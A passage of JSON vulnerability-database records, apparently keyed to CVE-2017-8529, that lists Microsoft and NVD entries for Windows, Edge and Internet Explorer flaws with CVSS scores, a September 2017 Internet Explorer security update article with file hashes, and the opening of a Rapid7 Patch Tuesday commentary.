9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0291", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0291", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0291", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8469", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8469", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8469", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A denial of service vulnerability exists in Microsoft Windows when an unauthenticated attacker sends a specially crafted kernel mode request.\n\nAn attacker who successfully exploited this vulnerability could cause a denial of service on the target system, causing the machine to either stop responding or reboot.\n\nThe security update addresses the vulnerability by changing how Windows handles certain types of kernel mode requests.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows VAD Cloning Denial of Service Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8515", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8515", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8515", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8533", "CVE-2017-8529"], "modified": "2019-06-11T07:00:00", "id": "MS:CVE-2017-8533", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8533", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n\nThe update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Uniscribe Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0284", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0284", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0284", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8489", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8489", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8489", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-10-18T16:36:41", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, and Windows Server 2012 and R2 allow an attacker to detect specific files on the user's computer when affected Microsoft scripting engines do not properly handle objects in memory, aka \"Microsoft Browser Information Disclosure Vulnerability\".", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8529", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529"], "modified": "2022-10-18T14:58:00", "cpe": ["cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:edge:-", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-8529", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8529", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:48:33", "description": "Microsoft Edge in Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user when the Edge JavaScript scripting engine fails to handle objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-8520, CVE-2017-8521, CVE-2017-8548, and CVE-2017-8549.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8499", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8499", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8549"], "modified": "2019-03-15T13:38:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-8499", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8499", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:48:52", "description": "Microsoft Edge in Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user when the Edge JavaScript scripting engine fails to handle objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-8499, CVE-2017-8520, CVE-2017-8548, and CVE-2017-8549.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8521", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8499", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8549"], "modified": "2017-06-21T15:18:00", "cpe": ["cpe:/a:microsoft:edge:*"], "id": "CVE-2017-8521", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8521", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:48:51", "description": "Microsoft Edge in Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user when the Edge JavaScript scripting engine fails to handle objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-8499, CVE-2017-8521, CVE-2017-8548, and CVE-2017-8549.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8520", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8499", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8549"], "modified": "2019-03-19T19:58:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-8520", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8520", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:49:16", "description": "Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system when Microsoft Edge improperly handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-8499, CVE-2017-8520, CVE-2017-8521, and CVE-2017-8549.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8548", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8499", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8549"], "modified": "2019-03-19T18:35:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-8548", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8548", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:49:17", "description": "Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system when Microsoft Edge improperly handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-8499, CVE-2017-8520, CVE-2017-8521, and CVE-2017-8548.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8549", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8499", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8549"], "modified": "2019-03-19T18:15:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-8549", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8549", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}], "mskb": [{"lastseen": "2022-11-10T10:20:14", "description": "None\n## Summary\n\nThis security update resolves several reported vulnerabilities in Internet Explorer. The most severe of these vulnerabilities could allow remote code execution if a user views a specially crafted webpage in Internet Explorer. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-US/security-guidance/>). Additionally, see the following articles for more information about this cumulative update:\n\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/en-us/help/4009469/windows-7-sp1-windows-server-2008-r2-sp1-update-history>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/en-us/help/4009471/windows-server-2012-update-history>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/en-us/help/4009470/windows-8-1-windows-server-2012-r2-update-history>)\n * [Windows 10 and Windows Server 2016 update history](<https://support.microsoft.com/en-us/help/4000825/windows-10-and-windows-server-2016-update-history>)\n**Important**\n\n * The fixes that are included in this Security Update for Internet Explorer 4036586 are also included in the September 2017 Security Monthly Quality Rollup. Installing either the Security Update for Internet Explorer or the Security Monthly Quality Rollup installs the fixes that are resolved in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security updates classifications for deployment, this Security Update for Internet Explorer 4036586, the September 2017 Security Only Quality Update, and the September 2017 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * This Security Update for Internet Explorer is not applicable for installation on a computer where the Security Monthly Quality Rollup or the Preview of Monthly Quality Rollup from September 2017 (or a later month) is already installed. This is because those updates contain all fixes that are in this Security Update for Internet Explorer.\nIf you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).**Note** With the rerelease of CVE-2017-8529 Microsoft has addressed previously known print issues related to this vulnerability; however, to prevent the potential for any further print regressions, the solution for CVE-2017-8529 is turned off by default. To be fully protected from this vulnerability, you need to apply a registry change after installing the update. For more information, go to [CVE-2017-8529](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8529>).\n\n## Deployment information\n\nFor deployment details for this security update, see the following article in the Microsoft Knowledge Base:Security update deployment information: September 12, 2017\n\n## How to get and install the update \n\n### Method 1: Microsoft Update\n\nThis update is available through Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically.For more information about how to get security updates automatically, see [Windows Update: FAQ](<http://support.microsoft.com/en-us/help/12373/windows-update-faq>). \n \nNote For Windows RT and Windows RT 8.1, this update is available through Microsoft Update only.\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=kb4036586>) website.\n\n## More Information\n\n## \n\n__\n\nHow to get help and support for this security update\n\nHelp for installing updates: [Windows Update: FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)\n\nFile informationFor a list of the files that are provided in this cumulative update, download the [file information for cumulative update 4036586](<http://download.microsoft.com/download/4/9/D/49D5D19C-61F5-485E-A778-B4A77BB9905E/4036586.csv>).\n\n## File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows8.1-KB4036586-x86.msu| 2CCE23B908D860C489D1E12127291FDCEBE4B8FC| 715083B8FCA497173FB6D77B458566A5FF94547548531E5687A7ACC3401DA8E3 \nWindows8.1-KB4036586-arm.msu| 23E0797B4F2F2B5046482607E4A0E7FB64FB512A| 33ABF4AEF8A8CE7B17ADC095BA7F37048C5741A967D378EA4F1ED097C0181721 \nWindows8.1-KB4036586-x64.msu| B6B49D1BC62F547698325BA6945A1B7B6E630725| 54A3A99677CE1D9C1BD5557F33481F4F9C0966F164F17C93F239C7248431A238 \nIE11-Windows6.1-KB4036586-X86.msu| A1EB4F1BCBF003890D20287D15C8864A5B574930| 45FFAE70123C5DCA3DC3AC3C583A0F1E62FEBC422F378B563C66DA63C4366657 \nIE11-Windows6.1-KB4036586-X64.msu| 0214C0DE68AAB4A4DC1D350AF5BC289561528193| 22BF654C7B9674F268C18D1B84F31D973E24167ABB651DB848E6CE5D4F94CF08 \nIE9-Windows6.0-KB4036586-X86.msu| 668DB855D0EAB1C135F2C4A544C4081644309514| F1D02B01C7721C029096459F3A4C87E6AD54CF4999A779F0F8056E8CFA36ADF6 \nIE9-Windows6.0-KB4036586-X64.msu| C7EAD6911FDF5DBF9AF675E2A665FB8668453A8F| 5FD7553406BD257C3143F4E181748D49B7EEB0358BA12AA732BE701D05551872 \nWindows8-RT-KB4036586-x64.msu| FBFCEA3DCA759E317FB36123722539687E790429| A3DBFC64746103E5A080A31DBE32507AF43926DCF865B0E9195CC5F2199F5D2B\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-09-12T07:00:00", "type": "mskb", "title": "Cumulative security update for Internet Explorer: September 12, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8741"], "modified": "2017-09-12T07:00:00", "id": "KB4036586", "href": "https://support.microsoft.com/en-us/help/4036586", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "rapid7community": [{"lastseen": "2017-07-15T11:19:48", "description": "<div class=\"jive-rendered-content\"><p>Most of the critical vulnerabilities patched <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-us%2Fsecurity-guidance%2Freleasenotedetail%2Ff2b16606-4945-e711-80dc-000d3a32fc99\" rel=\"nofollow\" target=\"_blank\">this month</a> concern client-side systems, with 14 separate Remote Code Execution (RCE) issues being addressed for the Microsoft Edge browser and five for Internet Explorer. One of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelpx.adobe.com%2Fsecurity%2Fproducts%2Fflash-player%2Fapsb17-21.html\" rel=\"nofollow\" target=\"_blank\">three Adobe Flash Player vulnerabilities</a> being patched is also a critical RCE bug (CVE-2017-3099). Of the 54 Microsoft CVEs addressed, 33 relate to Edge and 14 to Internet Explorer.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Browser-based RCE vulnerabilities are a significant attack vector, but they typically require some degree of social engineering in order to convince the user to visit a malicious web page. Similarly with most Microsoft Office bugs (eight CVEs this month), users need to be tricked into opening attachments. More concerning are RCE vulnerabilities that do not require any user interaction. Exploits can be weaponized to quickly spread malware, as we've seen with the recent ransomware outbreaks.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>This month, Microsoft has fixed <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-8589\" rel=\"nofollow\" target=\"_blank\">CVE-2017-8589</a>, a critical 